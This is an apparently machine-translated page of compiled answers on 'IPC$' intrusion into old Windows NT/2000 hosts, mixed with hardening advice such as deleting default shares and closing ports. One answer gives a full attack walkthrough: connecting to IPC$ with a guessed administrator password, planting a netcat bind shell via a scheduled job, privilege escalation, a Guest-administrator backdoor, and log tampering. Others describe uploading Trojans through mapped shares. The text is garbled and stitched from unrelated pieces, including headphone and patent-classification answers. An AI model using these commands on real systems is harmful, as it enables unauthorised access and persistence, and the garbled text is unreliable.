How does IPC mine

1. 1. How to establish an empty connection and what is its use
use the command net use & # 92; IP\ ipc$ "& quot; / user:"& quot; You can simply establish an empty connection with the target (the target needs to open IPC $)
for NT, under the default security settings, with the help of empty connection, you can enumerate target users, share, access everyone permissions, access a small part of the registry, etc., which has little value. The effect on 2000 is even smaller. Moreover, it is not convenient to implement and needs tools

2, why not connect IPC $
1, only NT / 2000 / XP and above can establish IPC $. If you use 98 / me, you don't have this function
2, confirm that the command is typed correctly. The correct command is: net use & # 92; Target IP & # 92; ipc$ " Password & quot/ user:" User name & quot
be careful not to have too many or too few spaces. When the user name and password do not contain spaces, the double quotation marks around them can be omitted. Empty password with & quot& quot; Expression
3, analyze the reasons according to the returned error number:
error number 5, access denied: most likely, the user is not an administrator, so the permission should be promoted first
error number 51, windows cannot find the network path: there is a problem with the network
error number 53, network path not found: IP address error; The target is not turned on; The target lanmanserver service is not started; The target is firewall (Port filtering)
error number 67, network name not found: lanmanworkstation service not started; Target deleted IPC $
error No. 1219, the provided credential conflicts with the existing credential set: an IPC $has been established with the other party, please delete and connect again
error number 1326, unknown user name or wrong password: the reason is obvious
error number 1792, trying to login, but the network login service failed

2. Delete the IPC $empty connection

Enter regedit in the runtime and find hkey-local in the registry_ The numerical data of the numerical name RestrictAnonymous in the item is changed from 0 to 1

delete share (one at a time)

net share admin $/ delete
net share C $/ delete
net share d $/ delete (if e, F, ... you can continue to delete)

let's talk about how to close the ports with common vulnerabilities:

1. Close port 139: right click the network neighborhood - properties - right click the local connection - properties - Internet Protocol / (TCP / IP) - properties - Advanced - wins - Disable NetBIOS on TCP / IP - OK

2. Right click - Network Neighborhood - properties / local connection - properties, and remove the tick in front of Microsoft network client. Then the Microsoft network file and printer sharing check is also removed

3. Close port 445: open the registry editor, and click_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ NetBT\ Add a DWORD key item under [parameters] and name it & quot; SmbDeviceEnabled"( Without quotation marks), set the value to 0< br />
4 Close port 3389: right click my computer and click Properties remote to remove the check before sending remote assistance invitation from this computer< br />
5 Close port 135:
how to close port 135
Windows XP system
run dcomcnfg, expand "component services" → "computer", right-click "my computer", select "properties", switch to "default properties", cancel "enable Distributed COM"; Then switch to "default protocol" and delete "connection oriented TCP / IP"

the above options have corresponding registry key values, so they can also be modified through the registry:
HKEY_ LOCAL_ MACHINE\ SOFTWARE\ Microsoft\ Ole\ The value of enable DCOM is changed to "n"
HKEY_ LOCAL_ MACHINE\ SOFTWARE\ Microsoft\ Rpc\ Delete "ncacn" in DCOM protocols_ ip_ In addition, the distributed transaction coordinator service needs to be disabled

after the restart, port 135 is gone<

Close unnecessary services:
in the control panel, find the management tool and open the services under it. Open and close the following items:
server (disable first, then stop.)
telnet (disable first, then stop.)
for the sake of your system security, it is better to shut down the above two dangerous services

if you shut down the above two services, your problems should be solved

3. IPC vulnerability attack is a very early vulnerability, and now it's basically not easy to use. We can simply introce a few commands to you, and experiment with virtual machine. Don't do bad things
first of all, an empty connection vulnerability must be opened on port 139.445. If it is not opened, it will not work.
generally, port 139 is opened, hehe. You can scan it with streamer, X-Scan and other scanning tools. If there is a vulnerability, you can directly connect with the empty connection
command: (192.168.0.12 this address is fabricated)
net use & # 92&# 92; 192.168.0.12\ ipc$ "& quot; / user:administrator
if the connection is successful, you will be prompted
net use Z: & # 92&# 92; 192.168.0.12\ C $
hide the other party's C disk to the local Z disk, and you can see the other party's C disk in my computer.
delete the IPC connection with the other party:
net use & # 92&# 92; 192.168.0.12\ IPC $/ del
upload the Trojan horse, control the shutdown, set from it, you can operate as you like, this will not teach you

4. IPC is the abbreviation of Internet process connection, that is, remote network connection. It is a special function of Windows NT and windows 2000. Its characteristic is that only one connection can be established between two IPS at the same time. All right, cut the crap and let's get to the point

how to find a host with IPC vulnerability? In the past, I used to combine a foreign scanning tool (I forgot its name) with killusa's letmein, because a lot of work is done by hand, so the speed can be imagined. Now because of Xiaorong's streamer 2000, it's too easy to find such a host. I won't tell you the specific operation. You can refer to the documentation of the software

OK, suppose we have found such a host, the address is 139.223.200.xxx, the administrator account is administrator, and the password is 123456. Enter the command line mode and officially start. It should be noted that the following operations are carried out under the ideal condition that the target host does not prohibit the remote IPC $connection and start the Schele service< br />
F:\& gt; net use \&# 92; 139.223.200.xxx\ ipc$ " 123456" / user:" Administrator"
command completed successfully< br />
F:\& gt; nc.exe \&# 92; 139.223.200.xxx\ Admin $
1 file has been copied< br />
F:\& gt; net time \&# 92; 139.223.200.xxx
\&# 92; The current time of 139.223.200.xxx is at 10:25 am on December 25, 2000
at & 92&# 92; The local time (GMT - 07:00) of 139.223.200.xxx is 2000 / 12 / 25 at 10:35 a.m.
the command completed successfully< br />
F:\& gt; at \&# 92; 139.223.200.xxx 10:38 NC - L - P 1234 - t - e cmd.exe
a new job is added, whose job id = 0

F: \& gt; Telnet 139.223.200.xxx 1234

the above commands are very simple. You just need to refer to the usage of net, at and NC. In this way, we boarded the remote host. The ideal situation is like this. However, you may encounter the situation that the Schele service of the target host is not started. Then, the at command cannot be used. We need to add the following steps< br />
F:\& gt; at \&# 92; 139.223.200.xxx 10:38 NC - L - P 1234 - t - e cmd.exe
the service has not started yet< br />
F:\& gt; netsvc \&# 92; 139.223.200.xxx schele /start
Service is running on \&# 92; 139.223.200.xxx

after boarding the remote host, what can we do? This depends on the permissions of the account and the security policy of the host. If you don't have enough permissions, try the following steps. First, execute the following command locally< br />
F:\& gt; getadmin.exe \&# 92; 139.223.200.xxx\ Admin $
1 file has been copied< br />
F:\& gt; gasys.dll \&# 92; 139.223.200.xxx\ Admin $
1 file has been copied

secondly, run the following command on the remote host< br />
C:\ WINNT\ system32> Getadmin

if you succeed, you will be the administrator of this host. Are you authorized enough?: -)

so what can we do now? Change home page? Download sam database? All right! There are many methods, I will not say one by one, specific methods can refer to the relevant tutorial. I am generally interested in word documents and databases on the target host

in fact, if you put a Trojan horse or virus on this machine, it's easier to do things, but I think if you don't have a deep hatred with him, you'd better not do it. It's not good

don't forget to be a back door when you've done what you're going to do< br />
C:\ WINNT\ system32> net user Guest 30906766
net use Guest 30906766
The command completed successfully.

C:\ WINNT\ system32> Net localgroup administrators guest / add
net localgroup administrators guest / add
the command completed successfully.

this is a relatively simple back door. If you want to do better, you can make a set of rootkits like Linux. In fact, there are already such things, you just need to use them. Now it's so much easier to do damage. There are so many fool tools for you to use, ah! If you want to protect yourself, how can you do without learning some safety knowledge

finally, we have to fix the log. Although redp0wer told me that very few administrators read NT logs, I think it's useful to repair them. Where is the NT log? You can refer to xudi's article. But one thing to remember is that the log can only be modified, not deleted, or you will sell yourself!: -) There are many command-line tools in this area, you can go to some foreign sites to have a look

in fact, with this host, you can do more

wisdom + perseverance + inspiration = success, this is my experience.

5. 1. Establish IPC connection net use ＼ IP password/ user:administrator2 . change telnet service to "automatic" SC ＼ IP config tlntsvr start = auto. Note: there is a space in front of auto. 3. Start telnet service SC ＼ IP start tlntsvr4. Telnet to server. Telnet IP SC start remoteaccess in the left column of registry editor, expand "Server1 & # 92; HKEY_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Then find the "fdenytsconnections" key in the right column (as shown in the figure), double-click to open it, change the key value to "0", click the "OK" button, and finally close the registry editor.

6. It's strange that you can connect to the Internet bar..
ordinary Intranet can also
net use #&# 92; ip\ ipc$ " Password & quot/ user:" Account number & quot
an empty connection does not need to enter an account number and password& quot; But the permission is very low

about IPC $, empty connection and default sharing
first of all, we need to point out that empty connection and IPC $are different concepts. An empty connection is a session established with the server without trust, in other words, it is an anonymous access to the server. IPC $is an open named pipeline for interprocess communication, which can obtain corresponding permissions by verifying user name and password. There are many tools that must use IPC $. The default share is open for remote management, including all logical disks (C $, D $, e $...) and system directory WinNT or windows (admin $)<

frequently asked questions and answers:
1, how to establish an empty connection and what is its use
use the command net use & # 92&# 92; IP\ ipc$ "& quot; / user:"& quot; You can simply establish an empty connection with the target (the target needs to open IPC $)
for NT, under the default security settings, with the help of empty connection, you can enumerate target users, share, access everyone permissions, access a small part of the registry, etc., which has little value. The effect on 2000 is even smaller. Moreover, it is not convenient to implement and needs tools

2, why can't I connect to IPC $
1, only NT / 2000 / XP and above can create IPC $. If you use 98 / me, you don't have this function
2, make sure your command is typed correctly. The correct command is: net use & # 92&# 92; Target IP & # 92; ipc$ " Password & quot/ user:" User name & quot
be careful not to have too many or too few spaces. When the user name and password do not contain spaces, the double quotation marks around them can be omitted. Empty password with & quot& quot; Expression
3, analyze the reasons according to the returned error number:
error number 5, access denied: it is very likely that the user you are using is not an administrator's permission, so first upgrade the permission
error number 51, windows cannot find the network path: there is a problem with the network
error number 53, network path not found: IP address error; The target is not turned on; The target lanmanserver service is not started; The target is firewall (Port filtering)
error number 67, network name not found: your lanmanworkstation service is not started; Target deleted IPC $
error No. 1219, the provided credentials conflict with the existing set of credentials: you have established an IPC $with the other party, please delete and connect again
error number 1326, unknown user name or wrong password: the reason is obvious
error number 1792, trying to login, but the network login service is not started: the target Netlogon service is not started This will happen when connecting to domain control)
the error number is 2242, and the password of this user has expired: the target has an account policy, and it is mandatory to change the password regularly

3, how to open the target IPC $
first of all, you need to get a shell that doesn't depend on IPC $, such as CMD extension of SQL, Telnet, Trojan horse. Of course, this shell must have admin permission. Then you can use the shell command net share IPC $to open the target IPC $. From the previous question, we can see that there are still many conditions for the use of IPC $. Please make sure that all the related services are running, and start it without it (I don't know how to do it, please see the usage of net command). If you still can't (for example, if you have a firewall, you can't kill it), I suggest you give up

4, how to map and access the default share
use the command net use Z: & # 92&# 92; Target IP & # 92; c$ " Password & quot/ user:" User name & quot; Map each other's C disk to its own Z disk, and so on
If IPC $has been established with the target, you can directly access it with IP plus drive character plus $instead. For example, muma.exe & #92&# 92; IP\ d$\ path\ muma.exe Or remapping is OK, just don't use user name and password: net use y: \&# 92; IP\ d$ Then muma.exe Y: \ path\ muma.exe When the path contains spaces, use & quot& quot; Lead all the paths

5, how to delete mapping and IPC $connection
use the command net use & # 92&# 92; IP\ IPC $/ del removes the IPC $connection to a target
delete the mapped Z disk with the command net use Z: / del, and so on
use the command net use * / del to delete all. You will be prompted to press y to confirm

6, connect IPC $and what can I do
you can successfully connect to the target IPC $by using an account with administrator rights, which means that you can have in-depth "communication" with the other system. You can use various command-line tools (such as pstools series, win2000srvreskit, telnethack, etc.) to obtain target information, manage target processes and services, etc. If the target opens the default share (you can help him open it if you don't), you can upload the Trojan and run it. It can also be uploaded by TFTP or FTP. Tools such as dwrcc, vnc and remoteadmin (Trojan horse) also have the function of directly controlling the screen. If it is 2000 server, you can also consider turning on terminal services to facilitate control. For the use of the tools mentioned here, please see the instructions or related tutorials

7, how to prevent others from using IPS $and default share to invade me< One way is to delete both IPC $and default share. But there will be more after the restart. This requires changing the registry
1, delete the existing
net share IPC $/ del
net share admin $/ del
net share C $/ del
... (there are several deleted)
2, forbid to establish empty connection
first, run regedit to find the following primary key [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Control\ LSA] change the key value of RestrictAnonymous (DWORD) to: 00000001< For the server version, find the following primary key [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters] change the key value of autoshareserver (DWORD) to: 00000000
for Pro version, it is [HKEY_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters] change the key value of autosharewks (DWORD) to: 00000000
if the primary key mentioned above does not exist, create a new one and then change the key value
B. the other is to turn off IPC $and default shared dependent services (not recommended)
net stop lanmanserver
you may be prompted that XXX service will also be turned off. Do you want to continue. Because there are some secondary services that depend on lanmanserver. Generally, press y to continue
C. The simplest way is to set a complex password to prevent exhausting passwords through IPC $. But if you have other vulnerabilities, IPC $will facilitate further intrusion
D. another way is to install a firewall or port filtering. Let's not talk about the method of firewall. Here's the port filtering:
configure the local policy to prohibit the connection of port 139 / 445

7. Explanation:
it's OK, because in addition to impedance, there's another thing called sensitivity. Listen to the comparison of TF10, IE80 and er4pt plugs, I feel that TF10 makes IPC push directly the best among the three, while er4pt doesn't play as well as expected. With the same volume, er4pt's voice is much lower, very depressing, IE80's average, at most 60%

with IPC, X90 can be pushed out of control in high frequency except for dental sounds. It can show the style of plug itself and is a powerful tool for human voice. The impedance of the MX90 is 64 ohm
in addition, the overall performance of gr07 with IPC direct push is not surprising, but it has some problems, but it is not brilliant. The impedance of this plug is 50 Ω.

8. There are a lot of articles about the intrusion of IPC $on the Internet, and there are also many excellent works. The attack steps have even become a classic model, so no one is willing to play with it again.
although I say that, I don't think these articles explain it in detail. For the rookies who contact IPC $for the first time, A simple list of steps can not solve many of their puzzles (you can search the IPC in a hack forum to see how many doubts there are).
so I wrote this tutorial, which is equivalent to solving puzzles. I want to make some confusing and confusing questions clear, so that we don't always linger in the same place! If you still have questions after reading this post, please reply immediately<

Second, what is IPC $
IPC $(Internet process connection) is sharing & quot; Named pipe & quot; It is an open named pipeline for interprocess communication. It can be used to remotely manage computers and view shared resources of computers by verifying user name and password to obtain corresponding permissions
with IPC $, the linker can even establish an empty connection with the target host without user name and password (of course, the other machine must have IPC $sharing, otherwise you can't connect), and with this empty connection, the linker can also get the user list on the target host (but the administrator in charge will prohibit exporting the user list)
we always talk about IPC $vulnerability IPC $vulnerability. In fact, IPC $is not a real vulnerability. It is a remote network login function for the convenience of remote management of administrators, and it also opens the default share, that is, all logical disks (C $, D $, e $...) and system directory WinNT or windows (admin $)
all of these, the original intention is to facilitate the management of administrators, but a good original intention does not necessarily have a good effect, some people with ulterior motives (what is the intention? I also don't know that (a pronoun) will use IPC $to access shared resources, export user list, and use some dictionary tools for password detection, hoping to obtain higher permissions, so as to achieve the purpose of hiding.

puzzle solving:
1) IPC connection is a unique remote network login function in Windows NT and above systems, which is equivalent to telnet in UNIX, Because IPC $function needs many DLL functions in Windows NT, it can't run in Windows 9. X
that is to say, only NT / 2000 / XP can establish IPC $connection, 98 / me can't establish IPC $connection (but some friends say that an empty connection can be established under 98, I don't know whether it's true or false, but now it's 2003, so I suggest 98 comrades change the system, 98 is not happy)
2) even an empty connection can't be established successfully, if the other party turns off IPC $sharing, You still can't establish a connection
3) it doesn't mean that you can view the user list of the other party after establishing an IPC $connection, because the administrator can prohibit exporting the user list

3. The role of establishing an IPC $connection in hack attack
as mentioned above, even if you establish an empty connection, You can also get a lot of information (and this information is often essential in the intrusion), access part of the sharing, if you can log in as a user with certain permissions, then you will get the corresponding permissions, obviously, if you log in as an administrator, hey, I don't have to say more, what u want, u can do
(basically, it can be summarized as acquiring target information, managing target processes and services, uploading Trojans and running them. If it's 2000 server, you can also consider opening terminal services to facilitate control? That's great!)
but don't be happy too soon, because the administrator's password is not so easy to get. Although there will be some silly administrators who use empty password or retarded password, it is a small number after all, and it is no longer better than before. With the improvement of people's security awareness, managers are becoming more and more careful, It will be more and more difficult to get the administrator password: (
therefore, in the future, you are most likely to connect with very little or no permission. You will slowly find that IPC $connection is not omnipotent, even when the host does not turn on IPC $sharing, you can't connect at all.
so I think that you should not regard IPC $intrusion as the ultimate weapon, and don't think it invincible, It's like passing a ball before shooting on the football field. It rarely has a fatal effect, but it's indispensable. I think that's the significance of IPC $connection in hack intrusion.

four IPC $and empty connection, 139445 port, default sharing relationship
the relationship between the above four may be a puzzle for rookies, but most articles do not give a special explanation, In fact, I don't understand it very thoroughly. It's all summed up in the communication with you. (a BBS with a good discussion atmosphere can be said to be a rookie's paradise)

1) IPC $and empty connection:
IPC $connection without user name and password is empty connection. Once you log in as a user or administrator (i.e. IPC $connection with specific user name and password), IPC $is empty connection, Naturally, it can't be called empty connection.
many people may want to ask, since you can connect empty, then I will connect empty in the future. Why do I have to spend a lot of effort to scan weak passwords? Ha ha, the reason mentioned above is that when you log in as an empty connection, you don't have any permissions (it's depressing), but when you log in as a user or administrator, You will have the corresponding permissions (who doesn't want to have permissions, so you'd better scan honestly and don't be lazy).
2) IPC $and 139445 port:
IPC $can realize remote login and access to the default share; The opening of port 139 indicates the application of NetBIOS protocol. We can access the shared file / printer through port 139445 (WIN2000). Therefore, generally speaking, IPC $connection needs port 139 or 445 to support.
3) IPC $and default share
the default share is opened by default to facilitate remote management of administrators (you can turn it off of course), That is, all the logical disks (C $, D $, e $...) and the system directory WinNT or windows (admin $), we can access these default shares through IPC $connection (provided that the other party does not turn off these default shares)

five reasons for IPC $connection failure
the following five reasons are common:
1) your system is not nt or above operating system
2) the other party does not open IPC $default sharing
3) the other party does not open port 139 or 445 (confused by the firewall)
4) your command input is wrong (such as the lack of space, etc.)
5) the user name or password is wrong (empty connection of course does not matter)
in addition, you can analyze the reasons according to the error number returned:
error number 5, Access denied: it is very likely that the user you are using is not an administrator's permission. First, upgrade the permission
error number 51, windows cannot find the network path: there is a problem with the network
error number 53, network path not found: IP address error; The target is not turned on; The target lanmanserver service is not started; The target is firewall (Port filtering)
error number 67, network name not found: your lanmanworkstation service is not started; Target deleted IPC $
error No. 1219, the provided credentials conflict with the existing set of credentials: you have established an IPC $with the other party, please delete and connect again
error number 1326, unknown user name or wrong password: the reason is obvious
error number 1792, trying to login, but the network login service is not started: the target Netlogon service is not started This will happen when connecting to domain control)
the error number is 2242, and the password of this user has expired: the target has an account policy, and it is mandatory to change the password regularly< In addition to the above reasons, there are also some other uncertain factors. I can't give a detailed and definite explanation here, so I'll rely on your own experience and experiment.

6. How to open the target IPC $(this paragraph is quoted from related articles)
first of all, you need to get a shell that doesn't depend on IPC $, such as SQL's CMD extension, Telnet Trojan horse, of course, this shell must have the permission of admin, and then you can use the shell to execute the command net share IPC $to open the target IPC $. It can be seen from the above that there are still many conditions for IPC $to be used. Please make sure that all related services are running. If you don't start it (I don't know how to do it, please see the usage of net command), or if it doesn't work (for example, if you have a firewall, you can't kill it), it is recommended to give up<

7 how to prevent IPC $intrusion
1 prohibit empty connections from enumerating (this operation does not prevent the establishment of empty connections, quoted from dissecting empty sessions under WIN2000).
first, run regedit and find the following composition [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Control\ LSA] change the key value of RestrictAnonymous = DWORD to: 00000001 (if it is set to 2, some problems will occur, For example, some win services have problems, etc.)

2 disable default sharing
1) view local shared resources
Run - CMD - enter net share
2) delete sharing (one at a time)
net share IPC $/ delete
net share admin $/ delete
net share C $/ delete
net share d $/ delete (if e, F, ... can continue to delete)
3) stop the server service
net stop server / Y (the server service will restart after restart)
4) modify the registry
Run - regedit
server version: find the following key [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters] change the key value of autoshareserver (DWORD) to: 00000000
Pro version: find the following primary key [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters] change the key value of autosharewks (DWORD) to: 00000000
if the primary key mentioned above does not exist, create a new key (right-click - New - double byte value) and then change the key value<

3 permanently turn off IPC $and default shared dependent services: lanmanserver is server service
control panel - Administrative Tools - Services - find server service (right click) - properties - General - Startup type - disabled

4 install firewall (select relevant settings), or port filter (filter out 139445, etc.), or set complex password with a new version of optimization master

5, Prevent the use of IPC $exhaustive password

(this tutorial is updated from time to time. For the latest version, please visit the official website: caicainiao community http://ccbirds.yeah.net

eight related commands
1) establish empty connection:
net use & # 92&# 92; IP\ ipc$ "& quot; / user:"& quot; ( It must be noted that this line of command contains three spaces)

2) to establish a non empty connection:
net use & # 92&# 92; IP\ ipc$ " User name & quot/ user:" Password & quot There are also three spaces)

3) mapping default share:
net use Z: &# 92&# 92; IP\ c$ " Password & quot/ user:" User name & quot You can map the other party's C disk to its own Z disk, and so on)
If IPC $has been established with the target, you can directly access it with the IP + drive letter + $and the specific command net use Z: &# 92&# 92; IP\ C $

4) delete an IPC $connection&# 92; IP\ IPC $/ del

5) delete share mapping
net use C:

9.

You can log in to the State Intellectual Property Office http://epub.sipo.gov.cn/ipc.jsp

Click IPC classification query

10. A detailed information about IPC $intrusion
a nag:
there are many articles about IPC $intrusion on the Internet, and there are many excellent works. The attack steps have even become a classic model, so no one is willing to play with it again.
however, I don't think these articles are detailed, For the rookies who contact IPC $for the first time, a simple list of steps can't answer many of their puzzles (you can search IPC in a hack forum to see how many doubts there are).
so I wrote this tutorial, which is equivalent to solving puzzles. I want to make some confusing and confusing questions clear, so that we don't always linger in the same place! If you still have questions after reading this post, please reply immediately<

Second, what is IPC $
IPC $(Internet process connection) is sharing & quot; Named pipe & quot; It is an open named pipeline for interprocess communication. It can be used to remotely manage computers and view shared resources of computers by verifying user name and password to obtain corresponding permissions
with IPC $, the linker can even establish an empty connection with the target host without user name and password (of course, the other machine must have IPC $sharing, otherwise you can't connect), and with this empty connection, the linker can also get the user list on the target host (but the administrator in charge will prohibit exporting the user list)
we always talk about IPC $vulnerability IPC $vulnerability. In fact, IPC $is not a real vulnerability. It is a remote network login function for the convenience of remote management of administrators, and it also opens the default share, that is, all logical disks (C $, D $, e $...) and system directory WinNT or windows (admin $)
all of these, the original intention is to facilitate the management of administrators, but a good original intention does not necessarily have a good effect, some people with ulterior motives (what is the intention? I also don't know that (a pronoun) will use IPC $to access shared resources, export user list, and use some dictionary tools for password detection, hoping to obtain higher permissions, so as to achieve the purpose of hiding.

puzzle solving:
1) IPC connection is a unique remote network login function in Windows NT and above systems, which is equivalent to telnet in UNIX, Because IPC $function needs many DLL functions in Windows NT, it can't run in Windows 9. X
that is to say, only NT / 2000 / XP can establish IPC $connection, 98 / me can't establish IPC $connection (but some friends say that an empty connection can be established under 98, I don't know whether it's true or false, but now it's 2003, so I suggest 98 comrades change the system, 98 is not happy)
2) even an empty connection can't be established successfully, if the other party turns off IPC $sharing, You still can't establish a connection
3) it doesn't mean that you can view the user list of the other party after establishing an IPC $connection, because the administrator can prohibit exporting the user list

3. The role of establishing an IPC $connection in hack attack
as mentioned above, even if you establish an empty connection, You can also get a lot of information (and this information is often essential in the intrusion), access part of the sharing, if you can log in as a user with certain permissions, then you will get the corresponding permissions, obviously, if you log in as an administrator, hey, I don't have to say more, what u want, u can do
(basically, it can be summarized as acquiring target information, managing target processes and services, uploading Trojans and running them. If it's 2000 server, you can also consider opening terminal services to facilitate control? That's great!)
but don't be happy too soon, because the administrator's password is not so easy to get. Although there will be some silly administrators who use empty password or retarded password, it is a small number after all, and it is no longer better than before. With the improvement of people's security awareness, managers are becoming more and more careful, It will be more and more difficult to get the administrator password: (
therefore, in the future, you are most likely to connect with very little or no permission. You will slowly find that IPC $connection is not omnipotent, even when the host does not turn on IPC $sharing, you can't connect at all.
so I think that you should not regard IPC $intrusion as the ultimate weapon, and don't think it invincible, It's like passing a ball before shooting on the football field. It rarely has a fatal effect, but it's indispensable. I think that's the significance of IPC $connection in hack intrusion.

four IPC $and empty connection, 139445 port, default sharing relationship
the relationship between the above four may be a puzzle for rookies, but most articles do not give a special explanation, In fact, I don't understand it very thoroughly. It's all summed up in the communication with you. (a BBS with a good discussion atmosphere can be said to be a rookie's paradise)

1) IPC $and empty connection:
IPC $connection without user name and password is empty connection. Once you log in as a user or administrator (i.e. IPC $connection with specific user name and password), IPC $is empty connection, Naturally, it can't be called empty connection.
many people may want to ask, since you can connect empty, then I will connect empty in the future. Why do I have to spend a lot of effort to scan weak passwords? Ha ha, the reason mentioned above is that when you log in as an empty connection, you don't have any permissions (it's depressing), but when you log in as a user or administrator, You will have the corresponding permissions (who doesn't want to have permissions, so you'd better scan honestly and don't be lazy).
2) IPC $and 139445 port:
IPC $can realize remote login and access to the default share; The opening of port 139 indicates the application of NetBIOS protocol. We can access the shared file / printer through port 139445 (WIN2000). Therefore, generally speaking, IPC $connection needs port 139 or 445 to support.
3) IPC $and default share
the default share is opened by default to facilitate remote management of administrators (you can turn it off of course), That is, all the logical disks (C $, D $, e $...) and the system directory WinNT or windows (admin $), we can access these default shares through IPC $connection (provided that the other party does not turn off these default shares)

five reasons for IPC $connection failure
the following five reasons are common:
1) your system is not nt or above operating system
2) the other party does not open IPC $default sharing
3) the other party does not open port 139 or 445 (confused by the firewall)
4) your command input is wrong (such as the lack of space, etc.)
5) the user name or password is wrong (empty connection of course does not matter)
in addition, you can analyze the reasons according to the error number returned:
error number 5, Access denied: it is very likely that the user you are using is not an administrator's permission. First, upgrade the permission
error number 51, windows cannot find the network path: there is a problem with the network
error number 53, network path not found: IP address error; The target is not turned on; The target lanmanserver service is not started; The target is firewall (Port filtering)
error number 67, network name not found: your lanmanworkstation service is not started; Target deleted IPC $
error No. 1219, the provided credentials conflict with the existing set of credentials: you have established an IPC $with the other party, please delete and connect again
error number 1326, unknown user name or wrong password: the reason is obvious
error number 1792, trying to login, but the network login service is not started: the target Netlogon service is not started This will happen when connecting to domain control)
the error number is 2242, and the password of this user has expired: the target has an account policy, and it is mandatory to change the password regularly< In addition to the above reasons, there are also some other uncertain factors. I can't give a detailed and definite explanation here, so I'll rely on your own experience and experiment.

6. How to open the target IPC $(this paragraph is quoted from related articles)
first of all, you need to get a shell that doesn't depend on IPC $, such as SQL's CMD extension, Telnet Trojan horse, of course, this shell must have the permission of admin, and then you can use the shell to execute the command net share IPC $to open the target IPC $. It can be seen from the above that there are still many conditions for IPC $to be used. Please make sure that all related services are running. If you don't start it (I don't know how to do it, please see the usage of net command), or if it doesn't work (for example, if you have a firewall, you can't kill it), it is recommended to give up<

7 how to prevent IPC $intrusion
1 prohibit empty connections from enumerating (this operation does not prevent the establishment of empty connections, quoted from dissecting empty sessions under WIN2000).
first, run regedit and find the following composition [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Control\ LSA] change the key value of RestrictAnonymous = DWORD to: 00000001 (if it is set to 2, some problems will occur, For example, some win services have problems, etc.)

2 disable default sharing
1) view local shared resources
Run - CMD - enter net share
2) delete sharing (one at a time)
net share IPC $/ delete
net share admin $/ delete
net share C $/ delete
net share d $/ delete (if e, F, ... can continue to delete)
3) stop the server service
net stop server / Y (the server service will restart after restart)
4) modify the registry
Run - regedit
server version: find the following key [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters] change the key value of autoshareserver (DWORD) to: 00000000
Pro version: find the following primary key [HKEY]_ LOCAL_ MACHINE\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters] change the key value of autosharewks (DWORD) to: 00000000
if the primary key mentioned above does not exist, create a new key (right-click - New - double byte value) and then change the key value<

3 permanently turn off IPC $and default shared dependent services: lanmanserver is server service
control panel - Administrative Tools - Services - find server service (right click) - properties - General - Startup type - disabled

4 install firewall (select relevant settings), or port filter (filter out 139445, etc.), or set complex password with a new version of optimization master

5, Prevent the use of IPC $exhaustive password

(this tutorial is updated from time to time. For the latest version, please visit the official website: caicainiao community http://ccbirds.yeah.net

eight related commands
1) establish empty connection:
net use & # 92&# 92; IP\ ipc$ "& quot; / user:"& quot; ( It must be noted that this line of command contains three spaces)

2) to establish a non empty connection:
net use & # 92&# 92; IP\ ipc$ " User name & quot/ user:" Password & quot There are also three spaces)

3) mapping default share:
net use Z: &# 92&# 92; IP\ c$ " Password & quot/ user:" User name & quot You can map the other party's C disk to its own Z disk, and so on)
If IPC $has been established with the target, you can directly access it with the IP + drive letter + $and the specific command net use Z: &# 92&# 92; IP\ C $

4) delete an IPC $connection&# 92; IP&#